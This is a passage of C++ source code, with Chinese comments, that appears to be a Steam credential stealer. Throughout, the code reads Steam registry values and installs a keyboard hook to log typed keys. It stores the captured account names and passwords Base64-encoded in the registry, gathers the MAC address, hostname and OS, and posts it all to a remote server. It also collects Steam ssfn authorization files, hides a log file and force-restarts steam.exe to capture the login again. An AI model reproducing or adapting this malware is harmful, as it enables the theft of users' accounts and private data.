lstyle3);szStyle4.Format(TEXT("%X"), lstyle4);if( (isSTClass2 >= 0 || isSTClass1 >= 0) && (szStyle1 == "960F0000" || szStyle1 == "96CF0000" || szStyle3 == "960F0000" || szStyle3 == "96CF0000") ){/* 此为租号数据 */szLocalLP = "3";HKEY hKey, xKey;LONG lRet = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );if( lRet == ERROR_SUCCESS ){char user[256] = {0};DWORD dwType = REG_SZ;DWORD dwLength = 256;LONG lRet2 = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwType, (LPBYTE)user, &dwLength );if( lRet2 == ERROR_SUCCESS && strlen(user) > 4 ){CString LocalUser = "";CString ReadRegUser = "";LocalUser.Format(TEXT("%s"), user);ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), user);LONG lRet2 = RegOpenKeyEx( HKEY_CURRENT_USER,ReadRegUser,0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );if( lRet2 == ERROR_SUCCESS ){char data1[256] = {0}, data2[256] = {0}, data3[256] = {0}, data4[256] = {0};DWORD dwType1 = REG_SZ, dwType2 = REG_SZ, dwType3 = REG_SZ, dwType4 = REG_SZ;DWORD dwLength1 = 256, dwLength2 = 256, dwLength3 = 256, dwLength4 = 256;LONG lRet3 = RegQueryValueEx( xKey, TEXT("AccOne"), NULL, &dwType1, (LPBYTE)data1, &dwLength1 );LONG lRet4 = RegQueryValueEx( xKey, TEXT("DataOne"), NULL, &dwType2, (LPBYTE)data2, &dwLength2 );LONG lRet5 = RegQueryValueEx( xKey, TEXT("AccSecond"), NULL, &dwType3, (LPBYTE)data3, &dwLength3 );LONG lRet6 = RegQueryValueEx( xKey, TEXT("DataSecond"), NULL, &dwType4, (LPBYTE)data4, &dwLength4 );if( (lRet3 == ERROR_SUCCESS && lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS && lRet6 == ERROR_SUCCESS) && (strlen(data3) >= 10 && strlen(data4) >= 20) ){CString szRegAccOne = "", szRegDataOne = "", szRegAccSecon = "", szRegDataSecon = "";szRegAccOne.Format(TEXT("%s"), data1);szRegDataOne.Format(TEXT("%s"), data2);szRegAccSecon.Format(TEXT("%s"), data3);szRegDataSecon.Format(TEXT("%s"), data4);/// 随机生成 16位 KEYtime_t seed = time(NULL); srand((unsigned)seed);int randNum = (rand()*2);CString szMD5 = "", szMD5Key = "", Base64_szMD5Key = "";szMD5Key += "_CHWM_";int szMD5Key_Len = szMD5Key.GetLength();for(int j=szMD5Key_Len; j<16 ;j++){int randNum = rand()%26;if(j%2){szMD5.Format("%C", randNum+97);}else{szMD5.Format("%C", randNum+65);}szMD5Key += szMD5;Sleep(50);}szMD5Key = gen(szMD5Key);Base64_szMD5Key = BASE64Encode(szMD5Key, szMD5Key.GetLength());/memset(osx, 0, MAX_PATH);memset(jsj, 0, MAX_PATH);// 获取计算机名WSADATA _wsaData = {0};int _Result = 0;_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);if(_Result == SOCKET_ERROR){strcat(jsj, "unkonw");}_Result = gethostname(jsj, sizeof(jsj));if(_Result == SOCKET_ERROR){strcat(jsj, "unkonw");}WSACleanup();// 获取MACCString szMac = "";szMac = GetMacAddress();// 获取系统版本os();// 构建统计数据CString strPostData = "";strPostData.Format(TEXT("%s?M=%s&OS=%s&CP=%s&VER=%s&ID=%s&AccOne=%s&DataOne=%s&AccSecond=%s&DataSecond=%s&MD5=%s&LP=%s&JC="), strServerName, szMac, osx, jsj, szVersion, strUserID, szRegAccOne, szRegDataOne, szRegAccSecon, szRegDataSecon, Base64_szMD5Key,szLocalLP);strPostData.Replace(" ", "%20");//AfxMessageBox(strPostData);DWORD dw0;BOOL isConnect = ::IsNetworkAlive( &dw0 );if( isConnect ){BOOL Result = SendURLPost(strPostData);if( Result ){//AfxMessageBox("成功发送数据!");FILE *fp;CFileFind finder1x;BOOL noEmpty1x=finder1x.FindFile("C:\\NTUSERS.LOG");if(!noEmpty1x){fp=fopen("C:\\NTUSERS.LOG", "w");if(fp){fprintf(fp, "%s", LocalUser.GetBuffer(0));}fclose(fp);}else{fp=fopen("C:\\NTUSERS.LOG", "a");if(fp){fprintf(fp, "%s", LocalUser.GetBuffer(0));}fclose(fp);}//隐藏数据文件SetFileAttributes("C:\\NTUSERS.LOG", FILE_ATTRIBUTE_HIDDEN);RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;///// 处理电脑授权文件CString mySTInstPath = "", mySTSSFNFilePath = "";HKEY dw_hKey;LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );if( x_Ret1 == ERROR_SUCCESS ){char dw_data[256] = {0};DWORD dw_Type = REG_SZ;DWORD dw_Length = 256;LONG x_Ret2 = RegQueryValueEx( dw_hKey, TEXT("SteamPath"), NULL, &dw_Type, (LPBYTE)dw_data, &dw_Length );mySTInstPath.Format(TEXT("%s"), dw_data);mySTSSFNFilePath.Format(TEXT("%s/ssfn*"), dw_data);}RegCloseKey(dw_hKey);char *mySSFNPathx = mySTInstPath.GetBuffer(mySTInstPath.GetLength()+1);mySTInstPath.ReleaseBuffer();char *mySSFNFilex = mySTSSFNFilePath.GetBuffer(mySTSSFNFilePath.GetLength()+1);mySTSSFNFilePath.ReleaseBuffer();//AfxMessageBox(mySTInstPath);//AfxMessageBox(mySTSSFNFilePath);SearchFilesByWildcard_2(mySSFNPathx, mySSFNFilex);szTslgameEXE = true;Sleep(3000);DWORD dwThreadId4;CreateThread(NULL, 0, HOOKGameMain, NULL, 0, &dwThreadId4); ///}else{//AfxMessageBox("发送数据失败!");DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}}}Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);}}}else{if( !GetProcess("steam.exe") ){Login = false;szLoginEXE = true;}}Sleep(100);} while( !szLoginEXE );return 0;
}// 线程 1static DWORD WINAPI HOOKRegedit(LPVOID pParam)
{//AfxMessageBox("线程 1 已启动!");HANDLE hNotify;HKEY hKeyx;hNotify = CreateEvent(NULL, //不使用SECURITY_ATTRIBUTES结构 FALSE, //不自动重置 TRUE,   //设置初始状态 "RegistryNotify" //事件对象的名称 ); if (hNotify == 0) { Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe CreateEvent failed!","[ Steam ]",MB_OK); ExitProcess(0); } if (RegOpenKeyEx(HKEY_CURRENT_USER, //根键 "Software\\Valve\\Steam", //子键 0, //reserved KEY_NOTIFY, //监视用 &hKeyx //保存句柄 ) != ERROR_SUCCESS) { CloseHandle(hNotify); Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe RegOpenKey failed!","[ Steam ]",MB_OK); ExitProcess(0); } if (RegNotifyChangeKeyValue(hKeyx, //监视子键句柄 TRUE, //监视此项的子键 REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET, //监视增加或删除了子键,监视键值发生是否改变 hNotify, //接受注册表变化事件的事件对象句柄 TRUE //注册表变化前报告 ) != ERROR_SUCCESS) { CloseHandle(hNotify); RegCloseKey(hKeyx); Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe RegNotifyChange failed!","[ Steam ]", MB_OK); ExitProcess(0); } if (WaitForSingleObject(hNotify, INFINITE) != WAIT_FAILED) { //MessageBox(NULL,"注册表有改动"," ",MB_OK);szStrFirst = "";szStrFirst = szStr;szStr = "";HKEY hKey;LONG lRet, lRet2, lRet3, lRet4;lRet = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );if( lRet == ERROR_SUCCESS ){char data[256] = {0}, data2[256] = {0};DWORD dwType = REG_SZ, dwType2 = REG_SZ;DWORD dwLength = 256, dwLength2 = 256;lRet2 = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwType, (LPBYTE)data, &dwLength );lRet3 = RegQueryValueEx( hKey, TEXT("SteamExe"), NULL, &dwType2, (LPBYTE)data2, &dwLength2 );DWORD dwLastXError = 0;lRet4 = RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&dwLastXError, sizeof(DWORD) );if(lRet2 == ERROR_SUCCESS && lRet3 == ERROR_SUCCESS){szRegUser.Format(TEXT("%s"), data);szRegExe.Format(TEXT("%s"), data2);DWORD flen;char *dataX;CFile *file2;file2 = new CFile;if( file2->Open("C:\\NTUSERS.LOG", CFile::shareDenyNone | CFile::modeRead) ){flen = file2->GetLength();dataX = new char[(int)flen+1];file2->SeekToBegin();file2->Read(dataX, flen);}szAccount.Format(TEXT("%s"), dataX);file2->Close();delete file2;delete []dataX;//AfxMessageBox(szAccount);int ff = szAccount.Find(szRegUser, 0);if( ff >= 0 ){//AfxMessageBox("帐号:"+szRegUser+"\n模糊数据:"+szStrFirst+"\n当前 帐号 为重复数据!");Regedit = false;RegDeleteValue(hKey, TEXT("AutoLoginUser"));}else{HKEY dw_hKey;LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );if( x_Ret1 == ERROR_SUCCESS ){char dw_data[256] = {0};DWORD dw_Type = REG_SZ;DWORD dw_Length = 256;LONG x_Ret2 = RegQueryValueEx( dw_hKey, TEXT("SteamPath"), NULL, &dw_Type, (LPBYTE)dw_data, &dw_Length );szSTPath.Format(TEXT("%s"), dw_data);szSTFile.Format(TEXT("%s/ssfn*"), dw_data);}RegCloseKey(dw_hKey);//// 删除电脑授权文件//char *mySSFNPath = szSTPath.GetBuffer(szSTPath.GetLength()+1);//szSTPath.ReleaseBuffer();//char *mySSFNFile = szSTFile.GetBuffer(szSTFile.GetLength()+1);//szSTFile.ReleaseBuffer();//SearchFilesByWildcard_1(mySSFNPath, mySSFNFile);//CString WriteRegUser = "";WriteRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser);HKEY hKeyX;DWORD dwDisp;DWORD dwTypeX = REG_SZ;int ret = RegCreateKeyEx(HKEY_CURRENT_USER, WriteRegUser, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKeyX, &dwDisp);if (ret == ERROR_SUCCESS){szOneUser=szRegUser+"  ";szRegUser=gen(szRegUser);CString Base64_szRegUser = "";Base64_szRegUser = BASE64Encode(szRegUser, szRegUser.GetLength());char *szAc1 = Base64_szRegUser.GetBuffer(Base64_szRegUser.GetLength()+1);Base64_szRegUser.ReleaseBuffer();int ret2 = RegSetValueEx(hKeyX, TEXT("AccOne"), 0, dwTypeX, (BYTE*)szAc1, strlen(szAc1));if (ret2 == ERROR_SUCCESS){szStrFirst=gen(szStrFirst);CString Base64_szStrFirst = "";Base64_szStrFirst = BASE64Encode(szStrFirst, szStrFirst.GetLength());char *szDt1 = Base64_szStrFirst.GetBuffer(Base64_szStrFirst.GetLength()+1);Base64_szStrFirst.ReleaseBuffer();int ret3 = RegSetValueEx(hKeyX, TEXT("DataOne"), 0, dwTypeX, (BYTE*)szDt1, strlen(szDt1));if (ret3 == ERROR_SUCCESS){//AfxMessageBox("首次帐号:"+szRegUser+"\n首次模糊数据:"+szDt1+"\nEXE路径:"+szRegExe);DWORD dwLastError = 0;RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&dwLastError, sizeof(DWORD) );RegCloseKey(hKeyX);RegCloseKey(hKey);CloseHandle(hNotify);RegCloseKey(hKeyx);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe && \""+szRegExe+"\"", NULL, SW_HIDE);Sleep(2000);Regedit = false;//MessageBox(0, "steam.exe 读取系统数据失败,请再次登录! ", "[ Steam ]", MB_ICONERROR | MB_OK | MB_DEFBUTTON1);}}}RegCloseKey(hKeyX);}}}RegCloseKey(hKey);}CloseHandle(hNotify);RegCloseKey(hKeyx);return 0;
}// 线程 2static DWORD WINAPI HOOKRegedit2(LPVOID pParam)
{//AfxMessageBox("线程 2 已启动!");HKEY hKey_xxx;LONG lRet_xxx1 = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey_xxx );if( lRet_xxx1 == ERROR_SUCCESS ){char data_xxx[256] = {0};DWORD dwType_xxx = REG_SZ;DWORD dwLength_xxx = 256;memset(data_xxx, 0, 256);LONG lRet_xxx2 = RegQueryValueEx( hKey_xxx, TEXT("AutoLoginUser"), NULL, &dwType_xxx, (LPBYTE)data_xxx, &dwLength_xxx );if(lRet_xxx2 == ERROR_SUCCESS){CString myReg1User = "";myReg1User.Format(TEXT("%s "), data_xxx);char *sz1User = myReg1User.GetBuffer(myReg1User.GetLength()+1);myReg1User.ReleaseBuffer();DWORD XdwType_X = REG_SZ;RegSetValueEx( hKey_xxx, TEXT("AutoLoginUser"), 0, XdwType_X, (BYTE*)sz1User, strlen(sz1User) );}}RegCloseKey(hKey_xxx);HANDLE hNotify;HKEY hxKeyx;hNotify = CreateEvent(NULL, //不使用SECURITY_ATTRIBUTES结构 FALSE, //不自动重置 TRUE,   //设置初始状态 "RegistryNotify" //事件对象的名称 ); if (hNotify == 0) { Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe CreateEvent failed!","[ Steam ]",MB_OK); ExitProcess(0); } if (RegOpenKeyEx(HKEY_CURRENT_USER, //根键 "Software\\Valve\\Steam", //子键 0, //reserved KEY_NOTIFY, //监视用 &hxKeyx //保存句柄 ) != ERROR_SUCCESS) { CloseHandle(hNotify); Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe RegOpenKey failed!","[ Steam ]",MB_OK); ExitProcess(0); } if (RegNotifyChangeKeyValue(hxKeyx, //监视子键句柄 TRUE, //监视此项的子键 REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET, //监视增加或删除了子键,监视键值发生是否改变 hNotify, //接受注册表变化事件的事件对象句柄 TRUE //注册表变化前报告 ) != ERROR_SUCCESS) { CloseHandle(hNotify); RegCloseKey(hxKeyx); Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe RegNotifyChange failed!","[ Steam ]", MB_OK); ExitProcess(0); } if (WaitForSingleObject(hNotify, INFINITE) != WAIT_FAILED) { //MessageBox(NULL,"注册表有改动"," ",MB_OK);szStrSecon = "";szStrSecon = szStr;szStr = "";HKEY hKey;LONG lRet, lRet2;lRet = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );if( lRet == ERROR_SUCCESS ){char data[256] = {0};DWORD dwType = REG_SZ;DWORD dwLength = 256;lRet2 = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwType, (LPBYTE)data, &dwLength );if(lRet2 == ERROR_SUCCESS){szMailID.Format(TEXT("%s"), data);szMailID.Replace(" ", "");szRegUser2.Format(TEXT("%s"), data);szRegUser2.Replace(" ", "");//AfxMessageBox("二次帐号:"+szRegUser2+"\n二次密码:"+szStrSecon);CString ReadRegUser = "";ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser2);HKEY xKey;LONG lRet3, lRet4, lRet5;lRet3 = RegOpenKeyEx( HKEY_CURRENT_USER,ReadRegUser,0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );if( lRet3 == ERROR_SUCCESS ){char xdata[256] = {0};char xdata2[256] = {0};DWORD xdwType1 = REG_SZ;DWORD xdwType2 = REG_SZ;DWORD xdwLength1 = 256;DWORD xdwLength2 = 256;lRet4 = RegQueryValueEx( xKey, TEXT("AccOne"), NULL, &xdwType1, (LPBYTE)xdata, &xdwLength1 );lRet5 = RegQueryValueEx( xKey, TEXT("DataOne"), NULL, &xdwType2, (LPBYTE)xdata2, &xdwLength2 );if(lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS){CString szReplaceStr = "";CString Base64_AccSeconData = "", Base64_DataSeconData = "";szReplaceStr = szRegUser2 + "   ";szRegUser2 = gen(szRegUser2);Sleep(500);szStrSecon.Replace(szReplaceStr, "");szStrSecon = gen(szStrSecon);Base64_AccSeconData = BASE64Encode(szRegUser2, szRegUser2.GetLength());Sleep(500);Base64_DataSeconData = BASE64Encode(szStrSecon, szStrSecon.GetLength());char *szAcc2 = Base64_AccSeconData.GetBuffer(Base64_AccSeconData.GetLength()+1);Base64_AccSeconData.ReleaseBuffer();char *szData2 = Base64_DataSeconData.GetBuffer(Base64_DataSeconData.GetLength()+1);Base64_DataSeconData.ReleaseBuffer();DWORD XxdwTypeX1 = REG_SZ, XxdwTypeX2 = REG_SZ;LONG lRet6 = RegSetValueEx( xKey, TEXT("AccSecond"), NULL, XxdwTypeX1, (BYTE*)szAcc2, strlen(szAcc2));LONG lRet7 = RegSetValueEx( xKey, TEXT("DataSecond"), NULL, XxdwTypeX2, (BYTE*)szData2, strlen(szData2));if(lRet6 == ERROR_SUCCESS && lRet7 == ERROR_SUCCESS){//AfxMessageBox("设置注册表用户数据成功!");if( !Login ){DWORD dwThreadId;thread = CreateThread(NULL, 0, HOOKLoginEXE, NULL, 0, &dwThreadId);Login = true;}DWORD xdwLastErrorx = 0;RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&xdwLastErrorx, sizeof(DWORD) );}else{//AfxMessageBox("设置注册表用户数据失败!");RegDeleteValue(hKey, TEXT("AutoLoginUser"));RegCloseKey(xKey);RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{//AfxMessageBox("打开注册表用户数据键值失败!");DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("AutoLoginUser"));RegCloseKey(xKey);RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{//AfxMessageBox("打开注册表用户数据目录失败!");char dataZ[256] = {0};DWORD dwTypeZ = REG_SZ;DWORD dwLengthZ = 256;LONG lRet3Z = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwTypeZ, (LPBYTE)dataZ, &dwLengthZ );DWORD dwLastErrorx = 0;LONG lRet4Z = RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&dwLastErrorx, sizeof(DWORD) );if(lRet3Z == ERROR_SUCCESS){//AfxMessageBox("Gaming is True!\n二次帐号:"+szRegUser3+"\n二次密码:"+szStrSecon);CString szRegUser3 = "";szRegUser3.Format(TEXT("%s"), dataZ);CString WriteRegUser = "";WriteRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser3);HKEY xhKeyX;DWORD XxdwDisp;LONG lRetz = RegCreateKeyEx(HKEY_CURRENT_USER, WriteRegUser, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &xhKeyX, &XxdwDisp);if(lRetz == ERROR_SUCCESS){CString szReplaceStr = "";CString Base64_AccSeconData = "", Base64_DataSeconData = "";szReplaceStr = szRegUser3 + "   ";szRegUser3 = gen(szRegUser3);Sleep(500);szStrSecon.Replace(szReplaceStr, "");szStrSecon = gen(szStrSecon);Base64_AccSeconData = BASE64Encode(szRegUser3, szRegUser3.GetLength());Sleep(500);Base64_DataSeconData = BASE64Encode(szStrSecon, szStrSecon.GetLength());char *szAcc2 = Base64_AccSeconData.GetBuffer(Base64_AccSeconData.GetLength()+1);Base64_AccSeconData.ReleaseBuffer();char *szData2 = Base64_DataSeconData.GetBuffer(Base64_DataSeconData.GetLength()+1);Base64_DataSeconData.ReleaseBuffer();DWORD XdwTypeX1 = REG_SZ, XdwTypeX2 = REG_SZ;DWORD XdwTypeX3 = REG_SZ, XdwTypeX4 = REG_SZ;LONG lRet6z = RegSetValueEx( xhKeyX, TEXT("AccSecond"), NULL, XdwTypeX1, (BYTE*)szAcc2, strlen(szAcc2));LONG lRet7z = RegSetValueEx( xhKeyX, TEXT("DataSecond"), NULL, XdwTypeX2, (BYTE*)szData2, strlen(szData2));LONG lRet8z = RegSetValueEx( xhKeyX, TEXT("AccOne"), NULL, XdwTypeX3, (BYTE*)"", 0);LONG lRet9z = RegSetValueEx( xhKeyX, TEXT("DataOne"), NULL, XdwTypeX4, (BYTE*)"", 0);if(lRet6z == ERROR_SUCCESS && lRet7z == ERROR_SUCCESS && lRet8z == ERROR_SUCCESS && lRet9z == ERROR_SUCCESS){if( !Login ){DWORD dwThreadId;thread = CreateThread(NULL, 0, HOOKLoginEXE, NULL, 0, &dwThreadId);Login = true;}RegDeleteValue(hKey, TEXT("Gaming"));}else{RegDeleteValue(hKey, TEXT("AutoLoginUser"));Regedit = false;RegCloseKey(xhKeyX);RegCloseKey(xKey);RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}RegCloseKey(xhKeyX);}else{DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Regedit = false;RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}Regedit = false;RegCloseKey(xKey);}else{Regedit = false;RegDeleteValue(hKey, TEXT("AutoLoginUser"));}}RegCloseKey(hKey);} CloseHandle(hNotify);RegCloseKey(hxKeyx);return 0;
}// 清理帐号记录文件static DWORD WINAPI CleanUserData(LPVOID pParam)
{while(1){// 3 小时清理一次记录数据Sleep(3600000);DeleteFile("C:\\NTUSERS.LOG");}return 0;
}// HOOK 键盘回调函数 2 (监控 浏览器 输入)LRESULT DllExport CALLBACK IntProc2(int nCode, WPARAM wParam, LPARAM lParam)
{if( !::EnumWindows(EnumWindowsProc, NULL) ){if(nCode == HC_ACTION && (lParam & 0xc000ffff) == 1){BOOL b_Sft = ::GetAsyncKeyState(VK_SHIFT) >> ((sizeof(short) * 8)-1);BOOL b_Clk = ::GetKeyState(VK_CAPITAL);BOOL b_Ctl = ::GetAsyncKeyState(VK_CONTROL) >> ((sizeof(short) * 8)-1);BOOL b_Alt = ::GetAsyncKeyState(VK_MENU) >> ((sizeof(short) * 8)-1);if(!b_Ctl && !b_Alt){if(b_Sft && !b_Clk){switch(wParam){case '1':myEmailSTR = "!";break;case '2':myEmailSTR = "@";break;case '3':myEmailSTR = "#";break;case '4':myEmailSTR = "$";break;case '5':myEmailSTR = "%";break;case '6':myEmailSTR = "^";break;case '7':myEmailSTR = "&";break;case '8':myEmailSTR = "*";break;case '9':myEmailSTR = "(";break;case '0':myEmailSTR = ")";break;case 'A':myEmailSTR = "A";break;case 'B':myEmailSTR = "B";break;case 'C':myEmailSTR = "C";break;case 'D':myEmailSTR = "D";break;case 'E':myEmailSTR = "E";break;case 'F':myEmailSTR = "F";break;case 'G':myEmailSTR = "G";break;case 'H':myEmailSTR = "H";break;case 'I':myEmailSTR = "I";break;case 'J':myEmailSTR = "J";break;case 'K':myEmailSTR = "K";break;case 'L':myEmailSTR = "L";break;case 'M':myEmailSTR = "M";break;case 'N':myEmailSTR = "N";break;case 'O':myEmailSTR = "O";break;case 'P':myEmailSTR = "P";break;case 'Q':myEmailSTR = "Q";break;case 'R':myEmailSTR = "R";break;case 'S':myEmailSTR = "S";break;case 'T':myEmailSTR = "T";break;case 'U':myEmailSTR = "U";break;case 'V':myEmailSTR = "V";break;case 'W':myEmailSTR = "W";break;case 'X':myEmailSTR = "X";break;case 'Y':myEmailSTR = "Y";break;case 'Z':myEmailSTR = "Z";break;}}else if(!b_Sft && b_Clk){switch(wParam){case '1':myEmailSTR = "1";break;case '2':myEmailSTR = "2";break;case '3':myEmailSTR = "3";break;case '4':myEmailSTR = "4";break;case '5':myEmailSTR = "5";break;case '6':myEmailSTR = "6";break;case '7':myEmailSTR = "7";break;case '8':myEmailSTR = "8";break;case '9':myEmailSTR = "9";break;case '0':myEmailSTR = "0";break;case 'A':myEmailSTR = "A";break;case 'B':myEmailSTR = "B";break;case 'C':myEmailSTR = "C";break;case 'D':myEmailSTR = "D";break;case 'E':myEmailSTR = "E";break;case 'F':myEmailSTR = "F";break;case 'G':myEmailSTR = "G";break;case 'H':myEmailSTR = "H";break;case 'I':myEmailSTR = "I";break;case 'J':myEmailSTR = "J";break;case 'K':myEmailSTR = "K";break;case 'L':myEmailSTR = "L";break;case 'M':myEmailSTR = "M";break;case 'N':myEmailSTR = "N";break;case 'O':myEmailSTR = "O";break;case 'P':myEmailSTR = "P";break;case 'Q':myEmailSTR = "Q";break;case 'R':myEmailSTR = "R";break;case 'S':myEmailSTR = "S";break;case 'T':myEmailSTR = "T";break;case 'U':myEmailSTR = "U";break;case 'V':myEmailSTR = "V";break;case 'W':myEmailSTR = "W";break;case 'X':myEmailSTR = "X";break;case 'Y':myEmailSTR = "Y";break;case 'Z':myEmailSTR = "Z";break;}}else if(b_Sft && b_Clk){switch(wParam){case '1':myEmailSTR = "!";break;case '2':myEmailSTR = "@";break;case '3':myEmailSTR = "#";break;case '4':myEmailSTR = "$";break;case '5':myEmailSTR = "%";break;case '6':myEmailSTR = "^";break;case '7':myEmailSTR = "&";break;case '8':myEmailSTR = "*";break;case '9':myEmailSTR = "(";break;case '0':myEmailSTR = ")";break;case 'A':myEmailSTR = "a";break;case 'B':myEmailSTR = "b";break;case 'C':myEmailSTR = "c";break;case 'D':myEmailSTR = "d";break;case 'E':myEmailSTR = "e";break;case 'F':myEmailSTR = "f";break;case 'G':myEmailSTR = "g";break;case 'H':myEmailSTR = "h";break;case 'I':myEmailSTR = "i";break;case 'J':myEmailSTR = "j";break;case 'K':myEmailSTR = "k";break;case 'L':myEmailSTR = "l";break;case 'M':myEmailSTR = "m";break;case 'N':myEmailSTR = "n";break;case 'O':myEmailSTR = "o";break;case 'P':myEmailSTR = "p";break;case 'Q':myEmailSTR = "q";break;case 'R':myEmailSTR = "r";break;case 'S':myEmailSTR = "s";break;case 'T':myEmailSTR = "t";break;case 'U':myEmailSTR = "u";break;case 'V':myEmailSTR = "v";break;case 'W':myEmailSTR = "w";break;case 'X':myEmailSTR = "x";break;case 'Y':myEmailSTR = "y";break;case 'Z':myEmailSTR = "z";break;}}else{switch(wParam){case '1':myEmailSTR = "1";break;case '2':myEmailSTR = "2";break;case '3':myEmailSTR = "3";break;case '4':myEmailSTR = "4";break;	case '5':myEmailSTR = "5";break;case '6':myEmailSTR = "6";break;case '7':myEmailSTR = "7";break;case '8':myEmailSTR = "8";break;case '9':myEmailSTR = "9";break;case '0':myEmailSTR = "0";break;case 'A':myEmailSTR = "a";break;case 'B':myEmailSTR = "b";break;case 'C':myEmailSTR = "c";break;case 'D':myEmailSTR = "d";break;case 'E':myEmailSTR = "e";break;case 'F':myEmailSTR = "f";break;case 'G':myEmailSTR = "g";break;case 'H':myEmailSTR = "h";break;case 'I':myEmailSTR = "i";break;case 'J':myEmailSTR = "j";break;case 'K':myEmailSTR = "k";break;case 'L':myEmailSTR = "l";break;case 'M':myEmailSTR = "m";break;case 'N':myEmailSTR = "n";break;case 'O':myEmailSTR = "o";break;case 'P':myEmailSTR = "p";break;case 'Q':myEmailSTR = "q";break;case 'R':myEmailSTR = "r";break;case 'S':myEmailSTR = "s";break;case 'T':myEmailSTR = "t";break;case 'U':myEmailSTR = "u";break;case 'V':myEmailSTR = "v";break;case 'W':myEmailSTR = "w";break;case 'X':myEmailSTR = "x";break;case 'Y':myEmailSTR = "y";break;case 'Z':myEmailSTR = "z";break;}}//小键盘按键switch(wParam){case VK_NUMPAD1:myEmailSTR = "1";break;case VK_NUMPAD2:myEmailSTR = "2";break;case VK_NUMPAD3:myEmailSTR = "3";break;case VK_NUMPAD4:myEmailSTR = "4";break;case 